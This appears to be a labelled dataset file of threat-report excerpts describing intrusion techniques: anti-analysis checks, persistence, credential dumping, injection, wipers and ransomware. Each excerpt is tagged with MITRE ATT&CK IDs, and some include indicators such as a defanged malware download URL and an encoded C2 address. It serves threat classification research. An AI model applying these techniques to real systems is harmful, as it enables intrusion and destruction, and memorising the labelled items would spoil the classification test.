{"text1":"The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT. The email subject was in Arabic, which translated to \u201cBusiness continuity management training\u201d. The email was sent to an address belonging to a user group, rather than a specific individual\u2019s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code","labels":"['T1497.001']"}
{"text1":"This function converts the given domain to \u201cbackdoor\u201d, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor","labels":"['T1484']"}
{"text1":"We believe that the injected script came from the Andariel group since the code has similar obfuscation and structure to the sample we previously found from them. The script was used to collect information from visitors\u2019 browser: browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects","labels":"['T1592.002']"}
{"text1":"As you can see from the VBScript file, the commands in the script are invoked using the wscript shell. It does two things: it creates a \u201cRunOnce\u201d key in the registry so that the VBScript is executed each time the user logs on the machine (indicating persistence) and second, the VBScript runs the executable file \u201cfirefox.exe","labels":"['T1547.001']"}
{"text1":"The task is used to start an IronPython script with the 64-bit version of the interpreter. However, the key didn\u2019t decrypt on any of the embedded files in the scripts we found. The task\u2019s description is PythonUpdateSrvc and it runs either on Windows startup when a user logs in or when one of two system events get created","labels":"['T1053.005']"}
{"text1":"Modify the shortcut that launches Telegram by replacing its path to the one corresponding to \u2018exe\u2019, as outlined below","labels":"['T1518', 'T1547.009']"}
{"text1":"We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc. to the C2","labels":"['T1041']"}
{"text1":"The loader performs a last check to ensure that the operating systems keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name \u2018ld_201127\u2019. The latter is to avoid double execution of its own instance","labels":"['T1614.001']"}
{"text1":"The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install\u202fLookBack\u00a0malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file\u202fTemptcm.tmp,\u202fwhich is a version of certutil.exe,\u202fis dropped to decode the PEM files using\u202fTemptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of\u202fLookBack\u202fmalware","labels":"['T1059.005']"}
{"text1":"The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim\u2019s machine. The path to the log file is hard-coded in the payload file, as shown here","labels":"['T1219']"}
{"text1":"Here, we show an example of a PDF campaign as seen from the point of view of the affected user. This malicious PDF only contains a URL to entice the user to view the file. If the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. Browser redirection Finally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. Malicious Word document The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. Decoy document opened in Word","labels":"['T1059.005']"}
{"text1":"It then allocates a buffer with PAGE_EXECUTE_READWRITE protection to store the decrypted code. After the buffers are allocated, the packer checks if a string argument, which will be used as a decryption key, was passed to the AddByGod function. Next, the packer uses the AES256 algorithm with a SHA1 derived key of the passed argument to decrypt the encrypted code. If the decryption is successful, the decrypted code is executed and a second stage payload runs. Luckily, we managed to obtain the password that was needed to execute the binary and decrypt the encrypted payload","labels":"['T1140']"}
{"text1":"It also turns off the Windows Security Center service to prevent alerting the user about the disabled firewall","labels":"['T1562.001']"}
{"text1":"Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen","labels":"['T1036.005']"}
{"text1":"AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details","labels":"['T1082']"}
{"text1":"While the logo and commands are identical to the original hacktool, the name was changed to OrangeTeghal. To evade security software while deploying this tool on compromised systems, the attackers use a technique revealed at Black Hat EU \u201817 in the presentation Lost in Transaction: Process Doppelg\u00e4nging. Process Doppelg\u00e4nging uses NTFS transactions to modify the executable of a seemingly benign process that is suspended right after creation","labels":"['T1055.013']"}
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan","labels":"['T1059.003']"}
{"text1":"ScreenCapture: It takes screenshots of the infected machine - Download Secondary Payloads: It downloads additional plugins and other malware - Enterprise-aware: It targets administrators and enterprises networks - Infiltrates the Exchange Server: It collects and steal sensitive information from the Microsoft Exchange mail system, including credentials and the domain certificate","labels":"['T1114.002']"}
{"text1":"Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of\u00a0common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static","labels":"['T1036.004']"}
{"text1":"X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot\u2019s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL","labels":"['T1547.001']"}
{"text1":"In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender","labels":"['T1562.001']"}
{"text1":"Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. The dumped hashes were used to authenticate to other machines via pass the hash","labels":"['T1550.002']"}
{"text1":"The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016\/11\/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word \u201cshinu\u201d used as a parameter could be a reference to the Arabic slang for the word \u201cwhat\u201d, as well as a reference to a village name in northwestern Iran. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective","labels":"['T1036.004']"}
{"text1":"Finally, the payloads were almost never repeated. The threat actor made sure that each payload had a unique hash, and some payloads were packed using different types of packers, both known and custom","labels":"['T1027.005', 'T1027.002']"}
{"text1":"txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols","labels":"['T1040']"}
{"text1":"websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts","labels":"['T1071.001']"}
{"text1":"Following a series of denial-of-service attacks and website defacements, the new destructive malware corrupts the master boot record (MBR), partition and file system of all available physical drives on Windows machines","labels":"['T1561.002']"}
{"text1":"On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware","labels":"['T1204.002']"}
{"text1":"UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note","labels":"['T1102']"}
{"text1":"The execution of the Powershell that is passed to IEX by the Stage 1 Word document is where we begin to observe several interesting activities occurring on an infected system. One is used to determine whether or not to achieve persistence for the next stage of the infection process on the target system. If persistence is selected the other switch defines whether or not the Stage 3 code should be executed once it is staged. If the option to achieve persistence was selected when the 'pre_logic' function was called, the function will then query the infected system to determine how to best achieve persistence. Depending on the access rights of the user account within which the malware is operating, the malware will then query registry paths that are commonly used by malware to achieve persistence. If operating under an account with Administrator access to the system the script will query and set","labels":"['T1547.001']"}
{"text1":"While operating in the victim\u2019s internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided. This information included items such as product\/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks. Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact","labels":"['T1213']"}
{"text1":"All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3","labels":"['T1204.002']"}
{"text1":"The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86","labels":"['T1543.003']"}
{"text1":"While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code","labels":"['T1547.009', 'T1059.003']"}
{"text1":"This spyware registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries","labels":"['T1543.003']"}
{"text1":"As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle\u2019s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ..\/Resources\/Base.lproj\/Submenu.nib. This file is copied directly to the users Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder","labels":"['T1564.001']"}
{"text1":"At the beginning of 2017, Silent Librarian began to regularly obtain free Let\u2019s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages","labels":"['T1588.004']"}
{"text1":"The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co","labels":"['T1553.002']"}
{"text1":"Lucifer also checks for the presence of following device drivers, DLLs, and virtual devices. If any of these objects are detected, the malware enters an infinite loop, stopping its execution from going further","labels":"['T1497.001']"}
{"text1":"If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1562.001']"}
{"text1":"The HTTP mode is the same communication method used in variants of the malware from 2018. Although it uses the non-encrypted HTTP protocol to communicate with the C2 it manually encrypts the contents of the requests to hide data from packet inspection. The malware creates an AES session key and initial value (as detailed in Appendix C) which are base64 encoded, appended to each other with a \\n separator. Once appended, it is further encrypted with a hardcoded RSA public key and base64 encoded again and obfuscated before being sent to the C2 as the body of a POST request","labels":"['T1573.001']"}
{"text1":"BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified","labels":"['T1071.001']"}
{"text1":"This watchdog process also ensures that the Cardinal RAT process is always running, as well as ensures that the executable is located in the correct path. Should either of these conditions not be met, the watchdog process will spawn a new instance of Cardinal RAT, or write Cardinal RAT to the correct location, respectively","labels":"['T1057']"}
{"text1":"The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks\u00ae Counter Threat Unit\u2122 (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group","labels":"['T1195.002']"}
{"text1":"In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment by BusinessLayerHost.exe at around 10:00 AM UTC. 7z.dll), Far Manager (e.g. The Variant 2 custom loaders were mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e. the open-source source code for these applications was modified to add in the malicious code). In some instances, certain development artifacts were left behind in the custom loader samples. For example, the following C++ header (.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code (c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp","labels":"['T1036']"}
{"text1":"KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32. _fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed the rest of the code takes care of restoring the KernelCallbackTable to its original state","labels":"['T1070']"}
{"text1":"In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function. Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine","labels":"['T1059.001']"}
{"text1":"The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them","labels":"['T1490']"}
{"text1":"Apart from being a flexible and easy-to-use scripting language, BLADABINDI\u2019s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload \u2014 the backdoor \u2014 difficult to detect","labels":"['T1027.004']"}
{"text1":"DEATHRANSOM creates an RSA-2048 public and private key pair. The shared secret is SHA256 hashed and used as the key to Salsa20 encrypt the RSA public and private keys. The RSA public key is used to encrypt the individual symmetric keys that are used to encrypt each file. A Base64 encoded version of the encrypted RSA keys and the victim\u2019s Curve25519 public key is included in the ransom note, providing the threat actors the information needed to decrypt the victim's files. For the symmetric key, DEATHRANSOM calls RtlGenRandom to generate 32 random bytes. This is the 32 byte key used to AES encrypt each file. After the file is encrypted, the AES key is encrypted with the public RSA key and appended to the file. DEATHRANSOM lastly appends the four magic bytes of AB CD EF AB at the end of the encrypted file and uses this as a check to ensure that it does not encrypt an already encrypted file. The analyzed DEATHRANSOM sample used for comparison does not change the file extension","labels":"['T1486']"}
{"text1":"The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server","labels":"['T1074.001']"}
{"text1":"In an uninhibited Emotet infection, it\u2019s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some\u00a0good analyses of Emotet\u00a0if you\u2019re looking for further reading","labels":"['T1210']"}
{"text1":"Another interesting artefact is that the script modifies the modification, access and creation (MAC) times of the local log file to match the times of a legitimate file \u2013 desktop.ini in that example, as shown in Figure 13","labels":"['T1070.006']"}
{"text1":"infpub.dat appears to be capable of brute-forcing NTLM login credentials to Windows machines that have pseudo-random IP addresses","labels":"['T1110.003']"}
{"text1":"The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potential vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute","labels":"['T1189']"}
{"text1":"Although tracking threats like Winnti involves old-fashioned investigative work, Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale. When attackers used Winnti to maintain access to web servers, they hid the implant in plain sight by masquerading it as a trusted, legitimate file","labels":"['T1036.005']"}
{"text1":"The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz","labels":"['T1003.001']"}
{"text1":"So attackers specify an external C&C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the internal network by the tool and any response that the tool gets from a computer in the internal network goes to the C&C server. Thus, attackers can communicate with internal servers that are normally unreachable from the internet","labels":"['T1090']"}
{"text1":"IronNetInjector is made of an IronPython script that contains a .NET injector and one or more payloads. The payloads can be also .NET assemblies (x86\/64) or native PEs (x86\/64). When an IronPython script is run, the .NET injector gets loaded, which in turn injects the payload(s) into its own or a remote process","labels":"['T1055']"}
{"text1":"Prior to executing fully, Karagany uses a robust anti-VM detection function that can detect most commonly used virtualization platforms such as VMWare, VirtualBox, VPC, and generic virtualization techniques. Only the VMWare and VirtualBox checks retained, mainly based on loaded drivers and file paths. This change dramatically reduced the file size of the malware","labels":"['T1497.001']"}
{"text1":"Next, the dropper checks its own parent process for indications that it is running in a sandbox setup. It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met","labels":"['T1057']"}
{"text1":"As with other versions of Winnti, the core component of the malware doesn\u2019t natively provide the operators with distinct functionality\u2078. This component is primarily designed to handle communications and the deployment of modules directly from the command-and-control servers. However, prior reporting\u2079 suggests that the operators commonly deploy plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host. We expect similar functionality to be leveraged via additional modules for Linux","labels":"['T1105']"}
{"text1":"In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook","labels":"['T1027']"}
{"text1":"The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied","labels":"['T1027.001']"}
{"text1":"In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group\u2019s modus operandi","labels":"['T1566.002']"}
{"text1":"The updated module is called tvncDLL and allows the threat actor to monitor the victim and collect information that would enable pivoting to valuable systems on the network","labels":"['T1021.005']"}
{"text1":"The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression","labels":"['T1027']"}
{"text1":"For readers unaware of ngrok, this site is a simple reverse proxy used to let Internet-based users connect to servers located behind firewalls or on local machines that don't have a public IP address","labels":"['T1090']"}
{"text1":"At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran\u2019s Railways and the message similar to the one displayed on the platform boards of different railway stations in Iran","labels":"['T1491.001']"}
{"text1":"Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads\u00a0following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE\u00a0backdoor. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1059.001']"}
{"text1":"Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload \u2013 part of Cobalt Strike software \u2013 to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks","labels":"['T1566.001']"}
{"text1":"Both masscan and pnscan have been used before by TeamTNT actors. However, the addition of zgrab, a GoLang network scanner, marks the first time that a GoLang tool has been witnessed incorporated into TeamTNT\u2019s TTPs. There was also an update to the masscan network scanner operation to include searching for TCP port 5555. This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations. However, there is little evidence to support TeamTNT targeting Android devices","labels":"['T1046']"}
{"text1":"The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group","labels":"['T1087.002']"}
{"text1":"The \u201cpc\u201d binary checks whether the infected system\u2019s OS is Debian or RHEL\/CentOS. Its routine, which involves dropping the cryptocurrency miner and other components, depends on OS. For Debian-based systems, it drops the cryptocurrency miner payload to \/tmp\/miner2. For CentOS\/RHEL systems, it will download a tar (tape archive) file from the URL, hxxp:\/\/pm[.]ipfswallet[.]tk\/cos7[.]tar[.]gz, containing the cryptocurrency miner and its multiple components, which is unpacked and then installed","labels":"['T1082']"}
{"text1":"The injected payload is known as Cobalt Strike Beacon and can be used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files. The\u00a0Get-NetComputer\u00a0command from\u00a0PowerView\u00a0is renamed by the attackers to a random name","labels":"['T1018']"}
{"text1":"Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis","labels":"['T1055.003']"}
{"text1":"After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers","labels":"['T1001.002']"}
{"text1":"It also uses \u201cActiveXObject\u201d utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them","labels":"['T1559.002']"}
{"text1":"h) It also uses \u201cActiveXObject\u201d utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them","labels":"['T1559.002']"}
{"text1":"With the above done, the malware logs off all users and executes a small program \u2014 a \u201clocker\u201d \u2014 in a new thread. The path to the locker file named mssetup.exe is retrieved from the configuration. Finally, before moving to its main cause \u2014 wiping the system \u2014 the malware creates a scheduled task that assures its own persistence in the system. The scheduled task will be executed every time the system starts","labels":"['T1053.005']"}
{"text1":"Malware uses xor key [0x09, 0xff, 0x20] to decrypt content in .data section and get string \u201caHR0cDovLzUxLjE1LjE5Ni4zMC8xL2luZGV4LnBocA\u201d. Then malware does base64 decoding to get the C2 address","labels":"['T1140']"}
{"text1":"Activation of these hooks is done by Ebury injecting its dynamic library into every descendant processes of sshd. To inject itself into subprocesses, Ebury hooks execve and use the dynamic linker LD_PRELOAD variable. Every time a new process is created, Ebury adds LD_PRELOAD=<Ebury_filename> to its environment. Once the new process is executed, Ebury\u2019s dynamic library is loaded and its constructor is called, executing the hooking routines","labels":"['T1574.006']"}
{"text1":"One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory. While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256. CrowdStrike was able to reconstruct the PowerShell script from the PowerShell Operational event log as the script\u2019s execution was logged automatically due to the use of specific keywords. CrowdStrike recommends that organizations upgrade PowerShell on their systems, as this functionality is only available with PowerShell version 5 and above","labels":"['T1059.001']"}
{"text1":"Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name \u201cremote overlay\u201d) designed to appear like they are part of the bank\u2019s website. These pages can either block the victim\u2019s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out","labels":"['T1185']"}
{"text1":"Each of these weaponized documents used the same tactic for their attacks. Upon opening the document, it leveraged the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document as seen in Figure 4","labels":"['T1221']"}
{"text1":"Daserf also uses file and folder names related to legitimate programs often found in Windows environments in order to blend in. Observed folder names include HP, Intel, Adobe, and perflogs and folders are generally created in either the root drive or the Application Data or Program Files folders. File names used in recent attacks include adobe.exe, adobe_sl.exe, intel.exe, and intellog.exe","labels":"['T1036.005']"}
{"text1":"Microsoft has been monitoring these attacks and notifying targeted customers for several months, but only recently reached a point in our investigation where we can attribute the activity to Strontium with high confidence. MSTIC\u2019s investigation revealed that Strontium has evolved its tactics since the 2016 election to include new reconnaissance tools and new techniques to obfuscate their operations. In recent months, it has engaged in brute force attacks and password spray, two tactics that have likely allowed them to automate aspects of their operations. Strontium also disguised these credential harvesting attacks in new ways, running them through more than 1,000 constantly rotating IP addresses, many associated with the Tor anonymizing service. Strontium even evolved its infrastructure over time, adding and removing about 20 IPs per day to further mask its activity","labels":"['T1110.003']"}
{"text1":"Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered","labels":"['T1528']"}
